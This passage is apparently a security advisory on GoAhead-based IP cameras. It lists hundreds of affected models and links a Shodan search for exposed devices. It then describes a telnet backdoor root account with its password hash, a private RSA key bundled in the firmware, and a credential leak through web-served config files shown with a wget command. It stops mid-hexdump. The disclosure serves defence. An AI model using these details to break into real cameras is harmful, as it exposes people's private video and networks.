\nAgasio A512 \nAgasio A533W \nAgasio A602W \nAgasio A603W \nAgasio Other \nAirLink Other \nAirmobi HSC321 \nAirsight Other \nAirsight X10 \nAirsight X34A \nAirsight X36A \nAirsight XC39A \nAirsight XX34A \nAirsight XX36A \nAirsight XX40A \nAirsight XX60A \nAirsight x10 \nAirsight x10Airsight \nAirsight xc36a \nAirsight xc49a \nAirsight xx39A \nAirsight xx40a \nAirsight xx49a \nAirsight xx51A \nAirsight xx51a \nAirsight xx52a \nAirsight xx59a \nAirsight xx60a \nAkai AK7400 \nAkai SP-T03WP \nAlecto 150 \nAlecto Atheros \nAlecto DVC-125IP \nAlecto DVC-150-IP \nAlecto DVC-1601 \nAlecto DVC-215IP \nAlecto DVC-255-IP \nAlecto dv150 \nAlecto dvc-150ip \nAlfa 0002HD \nAlfa Other \nAllnet 2213 \nAllnet ALL2212 \nAllnet ALL2213 \nAmovision Other \nAndroid+IP+cam IPwebcam \nAnjiel ip-sd-sh13d \nApexis AH9063CW \nApexis APM-H803-WS \nApexis APM-H804-WS \nApexis APM-J011 \nApexis APM-J011-Richard \nApexis APM-J011-WS \nApexis APM-J012 \nApexis APM-J012-WS \nApexis APM-J0233 \nApexis APM-J8015-WS 
\nApexis GENERIC \nApexis H \nApexis HD \nApexis J \nApexis Other \nApexis PIPCAM8 \nApexis Pyle \nApexis XF-IP49 \nApexis apexis \nApexis apm- \nApexis dealextreme \nAquila+Vizion Other \nArea51 Other \nArmorView Other \nAsagio A622W \nAsagio Other \nAsgari 720U \nAsgari Other \nAsgari PTG2 \nAsgari UIR-G2 \nAtheros ar9285 \nAvantGarde SUMPPLE \nAxis 1054 \nAxis 241S \nB-Qtech Other \nB-Series B-1 \nBRAUN HD-560 \nBRAUN HD505 \nBeaulieu Other \nBionics Other \nBionics ROBOCAM \nBionics Robocam \nBionics T6892WP \nBionics t6892wp \nBlack+Label B2601 \nBravolink Other \nBreno Other \nCDR+king APM-J011-WS \nCDR+king Other \nCDR+king SEC-015-C \nCDR+king SEC-016-NE \nCDR+king SEC-028-NE \nCDR+king SEC-029-NE \nCDR+king SEC-039-NE \nCDR+king sec-016-ne \nCDXX Other \nCDXXcamera Any \nCP+PLUS CP-EPK-HC10L1 \nCPTCAM Other \nCamscam JWEV-372869-BCBAB \nCasa Other \nCengiz Other \nChinavasion Gunnie \nChinavasion H30 \nChinavasion IP611W \nChinavasion Other \nChinavasion ip609aw \nChinavasion ip611w \nCloud MV1 \nCloud Other \nCnM IP103 \nCnM Other \nCnM sec-ip-cam \nCompro NC150/420/500 \nComtac CS2 \nComtac CS9267 \nConceptronic CIPCAM720PTIWL \nConceptronic cipcamptiwl \nCybernova Other \nCybernova WIP604 \nCybernova WIP604MW \nD-Link DCS-910 \nD-Link DCS-930L \nD-Link L-series \nD-Link Other \nDB+Power 003arfu \nDB+Power DBPOWER \nDB+Power ERIK \nDB+Power HC-WV06 \nDB+Power HD011P \nDB+Power HD012P \nDB+Power HD015P \nDB+Power L-615W \nDB+Power LA040 \nDB+Power Other \nDB+Power Other2 \nDB+Power VA-033K \nDB+Power VA0038K \nDB+Power VA003K+ \nDB+Power VA0044_M \nDB+Power VA033K \nDB+Power VA033K+ \nDB+Power VA035K \nDB+Power VA036K \nDB+Power VA038 \nDB+Power VA038k \nDB+Power VA039K \nDB+Power VA039K-Test \nDB+Power VA040 \nDB+Power VA390k \nDB+Power b \nDB+Power b-series \nDB+Power extcams \nDB+Power eye \nDB+Power kiskFirstCam \nDB+Power va033k \nDB+Power va039k \nDB+Power wifi \nDBB IP607W \nDEVICECLIENTQ CNB \nDKSEG Other \nDNT CamDoo \nDVR DVR \nDVS-IP-CAM Other 
\nDVS-IP-CAM Outdoor/IR \nDagro DAGRO-003368-JLWYX \nDagro Other \nDericam H216W \nDericam H502W \nDericam M01W \nDericam M2/6/8 \nDericam M502W \nDericam M601W \nDericam M801W \nDericam Other \nDigix Other \nDigoo BB-M2 \nDigoo MM==BB-M2 \nDigoo bb-m2 \nDinon 8673 \nDinon 8675 \nDinon SEGEV-105 \nDinon segev-103 \nDome Other \nDrilling+machines Other \nE-Lock 1000 \nENSIDIO IP102W \nEOpen Open730 \nEST ES-IP602IW \nEST IP743W \nEST Other \nEZCam EPK-EP10L1 \nEZCam EZCam \nEZCam Other \nEZCam PAN/TILT \nEZCam Pan/Tilt \nEasyCam EC-101HD \nEasyCam EC-101HDSD \nEasyCam EC-101SD \nEasyCam EC-102 \nEasyCam Other \nEasyN 187 \nEasyN 1BF \nEasyN 720P \nEasyN F \nEasyN F-136 \nEasyN F-M136 \nEasyN F-M166 \nEasyN F-M181 \nEasyN F-M1b1 \nEasyN F-SERIES \nEasyN F133 \nEasyN F2-611B \nEasyN F3 \nEasyN F3-166 \nEasyN F3-176M \nEasyN F3-M166 \nEasyN F3-SERIES \nEasyN F3-Series \nEasyN F3-m187 \nEasyN F3M187 \nEasyN FS-613A-M136 \nEasyN FS-613B \nEasyN FS-613B-M166 \nEasyN FS-613B-MJPEG \nEasyN FS613 \nEasyN F_M10R \nEasyN H3-V10R \nEasyN H6-M137h \nEasyN M091 \nEasyN Other \nEasyN est-007660-611b \nEasyN est-007660333 \nEasyN f \nEasyN f-Series \nEasyN f138 \nEasyN f_series \nEasyN fseries \nEasyN kitch \nEasyN s \nEasySE F/B/N/I \nEasySE H3 \nEasySE H3e \nEasySE Other \nEbode IPV38W \nEbode IPV58 \nEbode Other \nEgo Other \nElro 901 \nElro 903 \nElro 903IP \nElro C7031P \nElro C703IP2 \nElro C704-IP \nElro C704IP \nElro C704IP.2 \nElro C704ip \nElro C803IP \nElro C903IP \nElro C903IP.2 \nElro C904IP \nElro C904IP.2 \nElro IP901 \nElro Other \nEminent 6564 \nEminent EM6220 \nEminent EM6564 \nEminent em6220 \nEsky C5900 \nEsky L \nEsky Live \nEsky c5900 \nEura-Tech IC-03C3 \nEyeCam ICAM-608 \nEyeCam IP65IW \nEyeCam Other \nEyeCam STORAGEOPTIONS \nEyeIPCam IP901W \nEyeSight ES-IP607W \nEyeSight ES-IP811W \nEyeSight ES-IP909IW \nEyeSight ES-IP935FW \nEyeSight ES-IP935IW \nEyeSight IP910IW \nEyeSight IP915IW \nEyeSight Other \nEyeSight ip609IW \nEyeSight ip909iw \nEyeSight ip915iw 
\nEyeSight mjpeg \nEyeSpy247 Other \nF-Series FSERIES \nF-Series Ip \nF-Series Other \nF-Series ip \nFirst+Concept Other \nFocuscam F19821W \nFoscam FI18904w \nFoscam FI18905E \nFoscam FI18905W \nFoscam FI18906w \nFoscam FI1890W \nFoscam FI18910E \nFoscam FI18910W \nFoscam FI18910w \nFoscam FI18916W \nFoscam FI18918W \nFoscam FI18919W \nFoscam FI19810W \nFoscam FI8094W \nFoscam FI81904W \nFoscam FI8601W \nFoscam FI8602W \nFoscam FI8606W \nFoscam FI8610w \nFoscam FI8903W \nFoscam FI8903W_Elita \nFoscam FI8904 \nFoscam FI8904W \nFoscam FI8905E \nFoscam FI8905W \nFoscam FI8905w \nFoscam FI8906w \nFoscam FI8907W \nFoscam FI8908W \nFoscam FI8909W \nFoscam FI890W \nFoscam FI8910 \nFoscam FI8910E \nFoscam FI8910W \nFoscam FI8910W_DW \nFoscam FI8910w \nFoscam FI8916W \nFoscam FI8918 \nFoscam FI89180w \nFoscam FI8918E \nFoscam FI8918W \nFoscam FI8918w \nFoscam FI8919W \nFoscam FI9804W \nFoscam FI9805E \nFoscam FI9810 \nFoscam FI9810W \nFoscam FI9818 \nFoscam FI9820w \nFoscam FI9821W \nFoscam FI9821w \nFoscam FL8910 \nFoscam FS18908W \nFoscam FS8910 \nFoscam Fi8910 \nFoscam Other \nFoscam fI8989w \nFoscam fi1890w \nFoscam fl8910w \nFoxCam PTZ2084-L \nGIGA gb \nGT+ROAD HS-006344-SPSLM \nGeneral Other \nGeneric All-in-one \nGeneric Billy \nGeneric DomeA-Outdoor \nGeneric IP \nGeneric Other \nGi-star+srl IP6031W \nGigaeye GB \nGoAhead EC-101SD \nGoAhead GoAheadWebs \nGoAhead IPCAM1 \nGoAhead IPCAM2 \nGoAhead Other \nGoAhead thedon \nGoCam Other \nGoclever EYE \nGoclever EYE2 \nGotake GTK-TH01B \nH+264+network+DVR 720p \nH+264+network+DVR Other \nH.264 Other \nH6837WI Other \nHD+IPC Other \nHD+IPC SV3C \nHDIPCAM Other \nHeden CAMH04IPWE \nHeden CAMHED02IPW \nHeden CAMHED04IP \nHeden CAMHED04IPWN \nHeden CAMHEDIPWP \nHeden Other \nHeden VisionCam \nHeden visionCam \nHiSilicon Other \nHikvision DS-2CD2132 \nHistream RTSP \nHooToo F-SERIES \nHooToo HOOTOO \nHooToo HT-IP006 \nHooToo HT-IP006N \nHooToo HT-IP009HDP \nHooToo HT-IP206 \nHooToo HT-IP207F \nHooToo HT-IP210HDP \nHooToo 
HT-IP210P \nHooToo HT-IP212 \nHooToo IP009HDP \nHooToo Other \nHooToo apm-h803-mpc \nHsmartlink Other \nHungtek WIFI \nICAMView Other \nICam I908W \nICam IP-1 \nICam Other \nICam Other2 \nICam dome \nINISOFT-CAM Stan \nINSTAR 4010 \nINVID Other \nIO+Data Other \nIP66 Other \nIPC IPC02 \nIPC Other \nIPC S5030-TF \nIPC S5030-m \nIPC SRICAM \nIPCC 3XPTZ \nIPCC 7210W \nIPCC IPCC-7210W \nIPCC x01 \nIPTeles Other \nIPUX ip-100 \nISIT Other \nIZOtech Other \nIZTOUCH 0009 \nIZTOUCH A001 \nIZTOUCH IZ-009 \nIZTOUCH LTH-A8645-c15 \nIZTOUCH Other \nIZTOUCH Other1 \nIZTOUCH ap001 \nIeGeek Other \nIeGeek ukn \nInkovideo V-104 \nIprobot3 Other \nJRECam JM3866W \nJWcam JWEV \nJWcam Other \nJaycar 3834 \nJaycar 720P \nJaycar Other \nJaycar QC-3831 \nJaycar QC-3832 \nJaycar QC-3834 \nJaycar QC-3836 \nJaycar QC-3839 \nJaytech IP6021W \nJhempCAM Back \nJhempCAM Other \nKaiKong 1601 \nKaiKong 1602w \nKaiKong Other \nKaiKong SIP \nKaiKong SIP1602 \nKaiKong SIP1602W \nKaiKong sip \nKaiKong sip1602w \nKenton gjc02 \nKinson C720PWIP \nKlok Other \nKnewmart KW01B \nKnewmart KW02B \nKogan KAIPC01BLKA \nKogan KAIPCO1BLKA \nKogan Other \nKogan encoder \nKogan kaipc01blkb \nKompernass IUK \nKoolertron Other \nKoolertron PnP \nKoolertron SP-SHEX21-SL \nLC+security Other \nLW lw-h264tf \nLYD H1385H \nLager Other \nLeadtek C351 \nLevelOne 1010/2010 \nLibor Other \nLifeTech MyLifeTech \nLifeTech Other \nLifeTech dd \nLilly Other \nLinq Other \nLloyds 1107 \nLoftek CXS \nLoftek Nexus \nLoftek Other \nLoftek SPECTOR \nLoftek Sendinel \nLoftek Sentinel \nLogiLink WC0030A \nLogiLink wc0044 \nLogitech C920 \nMCL 610 \nMJPEG Other \nMaginon 100 \nMaginon 10AC \nMaginon 20C \nMaginon IP-20c \nMaginon IPC \nMaginon IPC-1 \nMaginon IPC-10 \nMaginon IPC-100 \nMaginon IPC-100AC \nMaginon IPC-10AC \nMaginon IPC-2 \nMaginon IPC-20 \nMaginon IPC20C \nMaginon IPC_1A \nMaginon Other \nMaginon SUPRA \nMaginon Supra \nMaginon ipc \nMaginon ipc-1a \nMaginon ipc100a \nMaginon ipx \nMaginon w2 \nMarmitek GM-8126 
\nMaygion IP \nMaygion OTHER2 \nMaygion Other \nMaygion V3 \nMaygion black \nMediatech mt4050 \nMedisana SmartBabyMonitor \nMerlin IP \nMerlin Other \nMerlin vstc \nMessoa Other \nMingyoushi S6203Y-WR \nMomentum 2002 \nMomentum MO-CAM \nNEXCOM S-CAM \nNIP NIP-004500-KMTLU \nNIP NIP-075007-UPHTF \nNIP NIP-11BGPW \nNIP NIP-14 \nNTSE Other \nNeewer Other \nNeewer V-100 \nNeo+CoolCam NIP \nNeo+CoolCam NIP-02(OAM) \nNeo+CoolCam NIP-06 \nNeo+CoolCam NIP-066777-BWESL \nNeo+CoolCam NIP-102428-DFBEF \nNeo+CoolCam NIP-H20(OZX) \nNeo+CoolCam OBJ-007260-LYLDU \nNeo+CoolCam Other \nNeo+CoolCam neo \nNeo+CoolCam nip-11 \nNeo+CoolCam nip-20 \nNess Other \nNetView Other \nNetcam Dual-HD \nNetcam HSL-232245-CWXES \nNetcam OUVIS \nNetcam Other \nNetware Other \nNexxt+Solution Xpy \nNixzen Other \nNorthQ NQ-9006 \nOffice+One CM-I11123BK \nOffice+One IP-900 \nOffice+One IP-99 \nOffice+One Other \nOffice+One SC-10IP \nOffice+One ip-900 \nOffice+One ip900 \nOpexia OPCS \nOptica+Video FI-8903W \nOptica+Video FI-8918W \nOptica+Video Other \nOtto 4eye \nOvermax CamSpot \nOvermax Camspot \nOwlCam CP-6M201W \nP2p wificam \nPCS Other \nPanasonic BL-C131A \nPeopleFu IPC-674 \nPeopleFu IPCAM1 \nPeopleFu IPCAM2 \nPeopleFu IPCAM3 \nPeopleFu IPCAM5 \nPixpo 1Z074A2A0301627785 \nPixpo PIX006428BFYZY \nPixpo PIX009491MLJYM \nPixpo PIX009495HURFE \nPixpo PIX010584DFACE \nPlaisio IP \nPlanex Other \nPlanex PLANEX \nPolariod P351S \nPolaroid IP-100 \nPolaroid IP-101W \nPolaroid IP-200B \nPolaroid IP-201B \nPolaroid IP-350 \nPolaroid IP-351S \nPolaroid IP-360S \nPolaroid IP-810W \nPolaroid IP-810WZ \nPolaroid Other \nPolaroid POLIP101W \nPolaroid POLIP201B \nPolaroid POLIP201W \nPolaroid POLIP351S \nPolaroid POLIP35i5 \nPowerLead Caue \nPowerLead PC012 \nProveCam IP2521 \nProvision 717 \nProvision F-717 \nProvision F-737 \nProvision PT-737 \nProvision WP-711 \nProvision WP-717P \nPyle HD \nPyle HD22 \nPyle HD46 \nPyle Mine \nPyle PIPCAM15 \nPyle Pipcam12 \nPyle cam5 \nPyle pipcam25 \nPyle pipcam5 
\nQ-nest QN-100S \nQ-nest qn-100s \nQueback 720p \nROCAM NC-400 \nROCAM NC-500 \nROCAM NC300 \nROCAM NC300-1 \nROHS IP \nROHS none \nRTX 06R \nRTX DVS \nRTX IP-06R \nRTX IP-26H \nRTX Other \nRollei safetycam-10hd \nSES Other \nSKJM Other \nSST SST-CNS-BUI18 \nSVB+International SIP-018262-RYERR \nSafeHome 278042 \nSafeHome 616-W \nSafeHome IP601W-hd \nSafeHome Other \nSafeHome VGA \nSafeHome iprobot \nSamsung Other \nSantec-Video Other \nSarotech IPCAM-1000 \nSarotech ip300 \nScricam 004 \nScricam 192.168.1.7 \nScricam AP-004 \nScricam AP-009 \nScricam AP0006 \nScricam AP006 \nSecam+CCTV IPCAM \nSecam+CCTV Other \nSeculink 10709 \nSeculink Other \nSecur+Eye xxc5330 \nSeisa JK-H616WS \nSenao PTZ-01H \nSequrecam Other \nSequrecam PNP-125 \nSercomm Other \nShenwhen+Neo+Electronic+Co NC-541 \nShenwhen+Neo+Electronic+Co Other \nShenwhen+Neo+Electronic+Co X-5000B \nShenzhen 720P \nShixin+China IP-129HW \nSiepem IPC \nSiepem S5001Y-BW \nSiepem S6203y \nSiepem S6211Y-WR \nSimi+IP+Camera+Viewer Other \nSineoji Other \nSineoji PT-315V \nSineoji PT-3215P \nSineoji PT-325IP \nSinocam Other \nSky+Genious Genious \nSkytronic IP \nSkytronic IP99 \nSkytronic Other \nSkytronic WiFi \nSkytronic dome \nSmartEye Other \nSmartWares C723IP \nSmartWares c724ip \nSmartWares c923ip \nSmartWares c924ip \nSolwise SEC-1002W-IR \nSpy+Cameras WF-100PCX \nSpy+Cameras WF-110V \nSricam 0001 \nSricam 004 \nSricam A0009 \nSricam A001 \nSricam AP-001 \nSricam AP-003 \nSricam AP-004 \nSricam AP-005 \nSricam AP-006 \nSricam AP-009 \nSricam AP-012 \nSricam AP-CAM \nSricam AP0009 \nSricam AP002 \nSricam AP995 \nSricam Cam1 \nSricam Front \nSricam Home \nSricam Other \nSricam SP005 \nSricam SP012 \nSricam SP013 \nSricam SP015 \nSricam SRICAM \nSricam SRICAM1 \nSricam aj-c2wa-c118 \nSricam ap \nSricam ap006 \nSricam ap1 \nSricam h.264 \nSricam sp013 \nSricctv A-0006 \nSricctv A-009 \nSricctv AJ-006 \nSricctv AP-0001 \nSricctv AP-0005 \nSricctv AP-0009 \nSricctv AP-001 \nSricctv AP-002 \nSricctv AP-003 
\nSricctv AP-004 \nSricctv AP-004AF \nSricctv AP-005 \nSricctv AP-006 \nSricctv AP-007 \nSricctv AP-008 \nSricctv AP-009 \nSricctv AP-011 \nSricctv AP-014 \nSricctv H-264 \nSricctv Other \nSricctv P2P-BLACK \nSricctv P2P-Black \nSricctv SP-007 \nSricctv SR-001 \nSricctv SR-004 \nStar+Vedia 6836 \nStar+Vedia 7837-WIP \nStar+Vedia C-7835WIP \nStar+Vedia Other \nStar+Vedia T-6836WTP \nStar+Vedia T-7833WIP \nStar+Vedia T-7837WIP \nStar+Vedia T-7838WIP \nStarCam C33-X4 \nStarCam EY4 \nStarCam F6836W \nStarCam Other \nStarCam c7837wip \nStipelectronics Other \nStorage+Options HOMEGUARD \nStorage+Options Other \nStorage+Options SON-IPC1 \nSumpple 610 \nSumpple 610S \nSumpple 631 \nSumpple 960P \nSumpple S601 \nSumpple S610 \nSumpple S631 \nSumpple S651 \nSumpple qd300 \nSumpple s631 \nSunVision+US Other \nSunbio Other \nSuneyes Other \nSuneyes SP-T01EWP \nSuneyes SP-T01WP \nSuneyes SP-TM01EWP \nSuneyes SP-TM01WP \nSuneyes SP-tm05wp \nSunluxy H-264 \nSunluxy HZCam \nSunluxy Other \nSunluxy PTZ \nSunluxy SL-701 \nSupra+Space IPC \nSupra+Space IPC-1 \nSupra+Space IPC-100AC \nSupra+Space IPC-10AC \nSupra+Space Other11 \nSupra+Space ipc-20c \nSure-Eye Other \nSurecom LN-400 \nSwann 005FTCD \nSwann 440 \nSwann 440-IPC \nSwann ADS-440 \nSwann ADS-440-PTZ \nSwann ADS-CAMAX1 \nSwann Other \nSwann SWADS-440-IPC \nSwann SWADS-440IPC-AU \nSygonix 43176A \nSygonix 43558A \nSzneo CAM0X \nSzneo CoolCam \nSzneo NIP \nSzneo NIP-0 \nSzneo NIP-02 \nSzneo NIP-031 \nSzneo NIP-031H \nSzneo NIP-06 \nSzneo NIP-12 \nSzneo NIP-2 \nSzneo NIP-20 \nSzneo NIP-210485-ABABC \nSzneo NIP-26 \nSzneo NIP-X \nSzneo NP-254095 \nSzneo Other \nSzneo TFD \nTAS-Tech Other \nTechnaxx tx-23 \nTechview GM8126 \nTechview QC-3638 \nTechview qc3839 \nTemvis Other \nTenda C50S \nTenda c30 \nTenda c5+ \nTenvis 0012 \nTenvis 3815 \nTenvis 3815-W \nTenvis 3815W \nTenvis 3815W. 
\nTenvis 3815W2013 \nTenvis IP-319W \nTenvis IP-319w \nTenvis IP-391W \nTenvis IP-391WHD \nTenvis IP-602W \nTenvis IP602W \nTenvis IPROBOT \nTenvis JP-3815W \nTenvis JPT-3814WP2P \nTenvis JPT-3815 \nTenvis JPT-3815-P2P \nTenvis JPT-3815W \nTenvis JPT-3815W+ \nTenvis JPT-3815WP2P \nTenvis JPT-3815w \nTenvis JPT-3818 \nTenvis MINI-319W \nTenvis Mini-319 \nTenvis Other \nTenvis PT-7131W \nTenvis TH-661 \nTenvis TR-3818 \nTenvis TR-3828 \nTenvis TR3815W \nTenvis TZ100 \nTenvis TZ100/IPROBOT3 \nTenvus JPG3815W \nThreeboy IP-660 \nTopcam SL-30IPC01Z \nTopcam SL-720IPC02Z \nTopcam SL-910IW30 \nTopica+CCTV Other \nTrivision NC-335PW-HD-10 \nTrust NW-7500 \nTurbo+X Endurance \nTurbo+X IIPC-20 \nUokoo 720P \nVCatch Other \nVCatch VC-MIC720HK \nValtronics IP \nValtronics Other \nVandesc IP900 \nVantech Other \nVantech PTZ \nVideosec+Security IPC-103 \nVideosec+Security IPP-105 \nVimicro Other \nVitek+CCTV Other \nVstarcam 7823 \nVstarcam C-7824WIP \nVstarcam C-7833WIP-X4 \nVstarcam C-7833wip \nVstarcam C-7837WIP \nVstarcam C-7838WIP \nVstarcam C50S \nVstarcam C7816W \nVstarcam C7824WIP \nVstarcam C782WIP \nVstarcam C7842WIP \nVstarcam C93 \nVstarcam C=7824WIP \nVstarcam Cam360 \nVstarcam F-6836W \nVstarcam H-6837WI \nVstarcam H-6837WIP \nVstarcam H-6850 \nVstarcam H-6850WIP \nVstarcam H-6850wip \nVstarcam ICAM-608 \nVstarcam Other \nVstarcam T-6835WIP \nVstarcam T-6836WTP \nVstarcam T-6892wp \nVstarcam T-7815WIP \nVstarcam T-7833WIP \nVstarcam T-7833wip \nVstarcam T-7837WIP \nVstarcam T-7838WIP \nVstarcam T-7892WIP \nVstarcam T6836WTP \nVstarcam T7837WIP \nVstarcam c7815wip \nVstarcam c7833wip \nVstarcam c7850wip \nWanscam 00D6FB01980F \nWanscam 106B \nWanscam 118 \nWanscam 541-W \nWanscam 543-W \nWanscam 790 \nWanscam AJ-C0WA-198 \nWanscam AJ-C0WA-B106 \nWanscam AJ-C0WA-B116 \nWanscam AJ-C0WA-B168 \nWanscam AJ-C0WA-B1D8 \nWanscam AJ-C0WA-C0D8 \nWanscam AJ-C0WA-C116 \nWanscam AJ-C0WA-C126 \nWanscam AJ-C2WA-B118 \nWanscam AJ-C2WA-C116 \nWanscam AJ-C2WA-C118 \nWanscam 
AJ-C2WA-C198 \nWanscam AJ-COWA-B1D8 \nWanscam AJ-COWA-C116 \nWanscam AJ-COWA-C126 \nWanscam AJ-COWA-C128 \nWanscam AW00004J \nWanscam B1D8-1 \nWanscam C-118 \nWanscam C-126 \nWanscam Colour \nWanscam FI-18904w \nWanscam FR-4020A2 \nWanscam FR4020A2 \nWanscam HD-100W \nWanscam HW-0021 \nWanscam HW-0022 \nWanscam HW-0022HD \nWanscam HW-0023 \nWanscam HW-0024 \nWanscam HW-0025 \nWanscam HW-0026 \nWanscam HW-0028 \nWanscam HW-0033 \nWanscam HW-0036 \nWanscam HW-0038 \nWanscam HW-0039 \nWanscam HW-22 \nWanscam HW0030 \nWanscam IP \nWanscam JW-0001 \nWanscam JW-0003 \nWanscam JW-0004 \nWanscam JW-0004m \nWanscam JW-0005 \nWanscam JW-0006 \nWanscam JW-0008 \nWanscam JW-0009 \nWanscam JW-0010 \nWanscam JW-0011 \nWanscam JW-0011l \nWanscam JW-0012 \nWanscam JW-0018 \nWanscam JW-004 \nWanscam JW-009 \nWanscam JW-CD \nWanscam JW000008 \nWanscam JW0009 \nWanscam JW001 \nWanscam JW0012 \nWanscam JW008 \nWanscam JWEV \nWanscam JWEV-011777-NSRVV \nWanscam JWEV-011921-RXSXT \nWanscam JWEV-360171-BBEAC \nWanscam JWEV-380096-CECDB \nWanscam JWEV-PEPLOW \nWanscam NBC-543W \nWanscam NC-530 \nWanscam NC-541 \nWanscam NC-541/W \nWanscam NC-541W \nWanscam NC-541w \nWanscam NC-543W \nWanscam NCB-534W \nWanscam NCB-540W \nWanscam NCB-541W \nWanscam NCB-541WB \nWanscam NCB-543W \nWanscam NCBL-618W \nWanscam NCH-532MW \nWanscam NCL-610W \nWanscam NCL-612W \nWanscam NCL-616W \nWanscam NCL-S616W \nWanscam Other \nWanscam TG-002 \nWanscam WJ-0004 \nWanscam WX-617 \nWanscam Works \nWanscam XHA-120903181 \nWanscam XHA-4020a2 \nWanscam __PTZ \nWanscam chiOthernese \nWanscam ip \nWanscam jw0005 \nWanscam jw0010 \nWansview 541 \nWansview 625W \nWansview MCM-627 \nWansview N540w \nWansview NCB-534W \nWansview NCB-541W \nWansview NCB-541w \nWansview NCB-543W \nWansview NCB541W \nWansview NCB545W \nWansview NCL-610W \nWansview NCL610D04 \nWansview NCL614W \nWansview Other \nWansview dcs543w \nWansview nc543w \nWardmay+CCTV WDM-6702AL \nWatch+bot+Camera resup \nWebcamXP Other \nWinBook Other \nWinBook 
T-6835 \nWinBook T-6835WIP \nWinBook T-7838 \nWinic NVT-530004 \nWise+Group Other \nX-Price Other \nX10 39A \nX10 AIRSIGHT \nX10 AirSight \nX10 Airsight \nX10 Jake \nX10 Other \nX10 XC-38A \nX10 XX-36A \nX10 XX-39A \nX10 XX-56A \nX10 XX-59A \nX10 XX-60 \nX10 XX-69A \nX10 XX41Ahome \nXVision Other \nXXCamera 53100 \nXXCamera 5330-E \nXXCamera Other \nXXCamera XXC-000723-NJFJD \nXXCamera XXC-092411-DCAFC \nXXCamera XXC-50100-H \nXXCamera XXC-50100-T \nXXCamera XXC-5030-E \nXXCamera XXC-53100-T \nXXCamera XXC52130 \nXin+Ling Other \nYawcam Other \nZilink Other \nZmodo CMI-11123BK \nZmodo IP-900 \nZmodo Other \nZodiac+Security 909 \nZodiac+Security Other \nZoneway NC638MW-P \nZyXEL Other \nalexim Other \nalexim cam22822 \nalias Other \nall+in+one+ Other \nall+in+one+ b1 \nall-in-one Other \nallecto DVC-150IP \napc Other \nasw-006 Other \nboh l \nbravo Other \nbush+plus BU-300WF \nccam p2p \nchina 8904W \nchina HDIPCAM \nchina IPCAM \nchina Other \nchina PTZCAM \nchina np-02 \nciana+exports antani \ncina Other \ncoolead L \ncoolead L610WS \ndax Other \ndenver IPC-320 \ndenver IPO-320 \ne-landing 720p \neScam QF100 \nebw Other \nepexis PIPCAMHD82 \nepexis pipcam5 \nesecure nvp \ngeeya C602 \ngeeya P2P \ngeeya c801 \nhdcam Other \nhomeguard 720P \nhomeguard Other \nhomeguard Wireless \nhomeguard wifi \niView ID002A \niView Other \ninsteon 75790 \ninsteon 75790wh \ninsteon High \ninsteon Other \ninsteon Wireless \niuk 5A1 \nivision hdwificam \niwitness bullet \njwt Other \njyacam JYA8010 \nkadymay KDM-6800 \nkadymay KDM6702 \nkadymay KMD-6800 \nkadymay Other \nkang+xun xxc5030-t \nkines Other \nkiocong 1601 \nkiocong 1602 \nkiocong 1609 \nkiocong Other \nkodak 201pl \nkoicong 1601 \nl+series CAM0758 \nl+series CAM0760 \nl+series Other \nl+series V100 \nlogan n8504hh \nmeyetech 095475-caeca \nmeyetech 188091-EFBAE \nmeyetech Other \nmeyetech WirelessCam \nmicasaverde VistaCamSD \npipcam HD17 \npni 941w \npni IP451W \npni IP541W \npni IP941W \npni IP951W \npni Other \npnp IP 
\npnp Other \nsemac Other \nskylink WC-300PS \nstorex D-10H \n \nShodan lists 185 000 vulnerable cameras ( \nhttps://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41 \n). \n \n \n \n## Details - Backdoor account \n \nBy default, telnetd is running on the camera. \n \nuser@kali$ telnet 192.168.1.107 \nTrying 192.168.1.107... \nConnected to 192.168.1.107. \nEscape character is '^]'. \n \napk-link login: admin \nPassword: \n \ntelnet> q \nConnection closed. \nuser@kali$ \n \n \nOne backdoor account exists in the camera: \n \nroot:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh \n \n \n \n## Details - RSA key and certificates \n \nThe `/system/www/pem/ck.pem` contains an Apple certificate with a \nprivate RSA key: \n \n \n/ # cat /system/www/pem/ck.pem \nBag Attributes \nfriendlyName: Apple Production IOS Push Services: com.app.camera \nlocalKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \nsubject=/UID=com.app.camera/CN=Apple Production IOS Push Services: \ncom.app.camera/OU=SQ6NNPBE2K/C=US \nissuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer \nRelations/CN=Apple Worldwide Developer Relations Certification \nAuthority \n-----BEGIN CERTIFICATE----- \n[...] \n-----END CERTIFICATE----- \nBag Attributes \nfriendlyName: andrew \nlocalKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D \nKey Attributes: <No Attributes> \n-----BEGIN RSA PRIVATE KEY----- \n[...] \n-----END RSA PRIVATE KEY----- \n \n \n \n## Details - Pre-Auth Info Leak (credentials) within the GoAhead http server \n \nThe HTTP interface is provided by GoAhead. It allows 2 kinds of authentication: \n \n- - htdigest authentication OR \n- - authentication using credentials in URI (`?loginuse=LOGIN&?loginpas=PASS`). 
\n \n \nBy default, the web directory contains symbolic links to configuration \nfiles (`system.ini` and `system-b.ini` contain credentials): \n \n/tmp/web # ls -la *ini \nlrwxrwxrwx 1 root 0 25 Oct 27 02:11 \nfactory.ini -> /system/param/factory.ini \nlrwxrwxrwx 1 root 0 30 Oct 27 02:11 \nfactoryparam.ini -> /system/param/factoryparam.ini \nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 \nnetwork-b.ini -> /system/www/network.ini \nlrwxrwxrwx 1 root 0 23 Oct 27 02:11 \nnetwork.ini -> /system/www/network.ini \nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 \nsystem-b.ini -> /system/www/system.ini \nlrwxrwxrwx 1 root 0 22 Oct 27 02:11 \nsystem.ini -> /system/www/system.ini \n/tmp/web # \n \nWith valid credentials, an attacker can retrieve the configuration, as \nshown below: \n \nuser@kali$ wget -qO- 'http://admin:admin@192.168.1.107/system.ini'|xxd \n \n[...] \n000001d0: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n000001e0: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n000001f0: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n00000200: ffff ffff ffff ffff ffff ffff ffff ffff ................ \n00000210: ffff ffff ffff ffff ffff ffff 7b6f 1158 ............{o.X \n00000220: 0000 0000 0100 0000 7469 6d65 2e6e 6973 ........time.nis \n00000230: 742e 676f 